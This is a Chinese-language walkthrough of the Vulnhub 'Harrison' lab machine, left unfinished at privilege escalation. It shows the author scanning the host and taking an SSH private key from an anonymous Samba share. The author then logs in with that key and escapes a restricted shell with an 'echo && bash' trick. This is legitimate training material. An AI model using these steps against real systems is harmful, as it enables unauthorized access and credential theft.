Vulnhub之Harrison靶机测试过程(未能提权)
Harrison
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24urrently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:ce:24:39 1 60 PCS Systemtechnik GmbH
192.168.56.152 08:00:27:3c:68:e7 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192。168.56.152
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.152 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-04 01:32 EST
Nmap scan report for localhost (192.168.56.152)
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5b:87:f1:fe:67:8f:a6:ba:8b:75:3c:11:34:3d:b6:b8 (RSA)
| 256 93:87:7e:2e:5e:4e:ce:71:56:a1:1c:6b:fc:1f:6e:55 (ECDSA)
|_ 256 c0:14:c0:24:e8:a8:7e:d4:cd:a6:42:25:f3:48:47:94 (ED25519)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:3C:68:E7 (Oracle VirtualBox virtual NIC)
Service Info: Host: HARRISON; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-01-04T14:32:15
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: harrison
| NetBIOS computer name: HARRISON\x00
| Domain name: \x00
| FQDN: harrison
|_ System time: 2023-01-04T14:32:14+00:00
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.11 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、445(Samba)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ smbclient -L 192.168.56.152
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Private Disk
IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.152 failed (Error NT_STATUS_CONNECTION_REFUSED)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ smbclient //192.168.56.152/Private
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:12:55 2019
.bash_logout H 220 Wed Apr 4 14:30:26 2018
.profile H 807 Wed Apr 4 14:30:26 2018
.bashrc H 3771 Wed Apr 4 14:30:26 2018
silly_cats D 0 Thu Apr 18 12:55:51 2019
.ssh DH 0 Thu Apr 18 12:42:57 2019
flag.txt N 32 Thu Apr 18 12:14:18 2019
32894736 blocks of size 1024. 27322880 blocks available
smb: \> cat flag.txt
cat: command not found
smb: \> get flag.txt
getting file \flag.txt of size 32 as flag.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> cd .ssh
smb: \.ssh\> ls
. D 0 Thu Apr 18 12:42:57 2019
.. D 0 Thu Apr 18 12:55:51 2019
authorized_keys N 399 Thu Apr 18 12:42:57 2019
id_rsa A 1679 Thu Apr 18 12:14:17 2019
id_rsa.pub A 399 Thu Apr 18 12:14:17 2019
32894736 blocks of size 1024. 27322880 blocks available
smb: \.ssh\> get id_rsa
getting file \.ssh\id_rsa of size 1679 as id_rsa (7.5 KiloBytes/sec) (average 4.6 KiloBytes/sec)
smb: \.ssh\> get id_rsa.pub
getting file \.ssh\id_rsa.pub of size 399 as id_rsa.pub (129.9 KiloBytes/sec) (average 5.6 KiloBytes/sec)
smb: \.ssh\> cd ..
smb: \> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:12:55 2019
.bash_logout H 220 Wed Apr 4 14:30:26 2018
.profile H 807 Wed Apr 4 14:30:26 2018
.bashrc H 3771 Wed Apr 4 14:30:26 2018
silly_cats D 0 Thu Apr 18 12:55:51 2019
.ssh DH 0 Thu Apr 18 12:42:57 2019
flag.txt N 32 Thu Apr 18 12:14:18 2019
32894736 blocks of size 1024. 27322880 blocks available
smb: \> cd silly_cats
smb: \silly_cats\> ls -alh
NT_STATUS_NO_SUCH_FILE listing \silly_cats\-alh
smb: \silly_cats\> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:55:51 2019
cat3.jpg N 38624 Mon Jan 8 13:30:10 2018
cat1.jpg N 73946 Mon Jan 8 13:29:40 2018
cat2.jpg N 74130 Mon Jan 8 13:29:32 2018
32894736 blocks of size 1024. 27322880 blocks available
smb: \silly_cats\> get cat1.jpg
getting file \silly_cats\cat1.jpg of size 73946 as cat1.jpg (1951.7 KiloBytes/sec) (average 182.5 KiloBytes/sec)
smb: \silly_cats\> get cat2.jpg
getting file \silly_cats\cat2.jpg of size 74130 as cat2.jpg (624.1 KiloBytes/sec) (average 280.4 KiloBytes/sec)
smb: \silly_cats\> get cat3.jpg
getting file \silly_cats\cat3.jpg of size 38624 as cat3.jpg (6286.4 KiloBytes/sec) (average 348.6 KiloBytes/sec)
smb: \silly_cats\> cd ..
smb: \> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:12:55 2019
.bash_logout H 220 Wed Apr 4 14:30:26 2018
.profile H 807 Wed Apr 4 14:30:26 2018
.bashrc H 3771 Wed Apr 4 14:30:26 2018
silly_cats D 0 Thu Apr 18 12:55:51 2019
.ssh DH 0 Thu Apr 18 12:42:57 2019
flag.txt N 32 Thu Apr 18 12:14:18 2019
32894736 blocks of size 1024. 27322880 blocks available
smb: \> exit
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ls
authorized_keys cat1.jpg cat2.jpg cat3.jpg flag.txt id_rsa id_rsa.pub nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ steghide extract -sf cat1.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ stegseek cat1.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.91% (133.3 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ steghide extract -sf cat2.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ steghide extract -sf cat3.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ stegseek cat2.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.84% (133.2 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ stegseek cat3.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.74% (133.1 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ binwalk cat1.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ls
authorized_keys cat1.jpg cat2.jpg cat3.jpg flag.txt id_rsa id_rsa.pub nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ enum4linux 192.168.56.152
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jan 4 01:38:43 2023
=========================================( Target Information )=========================================
Target ........... 192.168.56.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.152 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 192.168.56.152 )===============================
Looking up status of 192.168.56.152
No reply from 192.168.56.152
==================================( Session Check on 192.168.56.152 )==================================
[+] Server 192.168.56.152 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.56.152 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.56.152 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.56.152 from srvinfo:
HARRISON Wk Sv PrQ Unx NT SNT Samba 4.7.6-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
======================================( Users on 192.168.56.152 )======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
================================( Share Enumeration on 192.168.56.152 )================================
do_connect: Connection to 192.168.56.152 failed (Error NT_STATUS_CONNECTION_REFUSED)
Sharename Type Comment
--------- ---- -------
Private Disk
IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.56.152
//192.168.56.152/Private Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.56.152/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.56.152 )===========================
[+] Attaching to 192.168.56.152 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: [Errno Connection error (192.168.56.152:139)] [Errno 111] Connection refused
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HARRISON
[+] Builtin
[+] Password Info for Domain: HARRISON
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.56.152 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.56.152 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-216848864-2603756302-216944148 and logon username '', password ''
S-1-5-21-216848864-2603756302-216944148-501 HARRISON\nobody (Local User)
S-1-5-21-216848864-2603756302-216944148-513 HARRISON\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\harrison (Local User)
==============================( Getting printer info for 192.168.56.152 )==============================
No printers returned.
enum4linux complete on Wed Jan 4 01:39:22 2023
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ls -alh
total 220K
drwxr-xr-x 2 kali kali 4.0K Jan 4 01:35 .
drwxr-xr-x 8 kali kali 4.0K Jan 4 01:30 ..
-rw-r--r-- 1 kali kali 399 Jan 4 01:35 authorized_keys
-rw-r--r-- 1 kali kali 73K Jan 4 01:34 cat1.jpg
-rw-r--r-- 1 kali kali 73K Jan 4 01:34 cat2.jpg
-rw-r--r-- 1 kali kali 38K Jan 4 01:34 cat3.jpg
-rw-r--r-- 1 kali kali 32 Jan 4 01:34 flag.txt
-rw-r--r-- 1 kali kali 1.7K Jan 4 01:34 id_rsa
-rw-r--r-- 1 kali kali 399 Jan 4 01:34 id_rsa.pub
-rw-r--r-- 1 root root 1.6K Jan 4 01:32 nmap_full_scan
──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ls -alh
total 220K
drwxr-xr-x 2 kali kali 4.0K Jan 4 01:35 .
drwxr-xr-x 8 kali kali 4.0K Jan 4 01:30 ..
-rw-r--r-- 1 kali kali 399 Jan 4 01:35 authorized_keys
-rw-r--r-- 1 kali kali 73K Jan 4 01:34 cat1.jpg
-rw-r--r-- 1 kali kali 73K Jan 4 01:34 cat2.jpg
-rw-r--r-- 1 kali kali 38K Jan 4 01:34 cat3.jpg
-rw-r--r-- 1 kali kali 32 Jan 4 01:34 flag.txt
-r-------- 1 kali kali 1.7K Jan 4 01:34 id_rsa
-rw-r--r-- 1 kali kali 399 Jan 4 01:34 id_rsa.pub
-rw-r--r-- 1 root root 1.6K Jan 4 01:32 nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.152
The authenticity of host '192.168.56.152 (192.168.56.152)' can't be established.
ED25519 key fingerprint is SHA256:O+XKyphfQuB/KW9A8/6nUKPZTAGMJNtRBH8CrijPGnY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.152' (ED25519) to the list of known hosts.
Welcome to Harrison. Enjoy your shell.
Type '?' or 'help' to get the list of allowed commands
harrison:~$ id
*** forbidden command: id
harrison:~$
但这是一个受限的shell
看是否可以通过指定的shell,以绕开限制:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.152 /bin/bash
*** forbidden path over SSH: "/bin/bash"
This incident has been reported.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.152 /bin/sh
*** forbidden path over SSH: "/bin/sh"
This incident has been reported.
用echo && 'bash'进行逃避
harrison:~$ echo && 'bash'
harrison@harrison:~$ id
uid=1000(harrison) gid=1000(harrison) groups=1000(harrison),27(sudo),999(docker)
harrison@harrison:~$ sudo -l
bash: sudo: command not found
harrison@harrison:~$ ls
flag.txt silly_cats
harrison@harrison:~$ cd /home
harrison@harrison:/home$ ls
harrison
harrison@harrison:/home$ cd harrison/
harrison@harrison:~$ ls -alh
total 44K
drwxr-xr-x 1 harrison harrison 4.0K Jan 4 14:41 .
drwxr-xr-x 1 root root 4.0K Apr 18 2019 ..
-rw-r--r-- 1 harrison harrison 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 harrison harrison 3.7K Apr 4 2018 .bashrc
drwx------ 2 harrison harrison 4.0K Jan 4 14:40 .cache
-rw------- 1 harrison harrison 8 Jan 4 14:41 .lhistory
-rw-r--r-- 1 harrison harrison 807 Apr 4 2018 .profile
drwxr-xr-x 1 harrison harrison 4.0K Apr 18 2019 .ssh
-rw-r--r-- 1 root root 32 Apr 18 2019 flag.txt
drwxr-xr-x 2 root root 4.0K Apr 18 2019 silly_cats
harrison@harrison:~$ cat flag.txt
It's not going to be that easy.
harrison@harrison:~$
提权
由于harrison是docker组成员,因此利用docker进行提权
(未完成)
STRIVE FOR PROGRESS,NOT FOR PERFECTION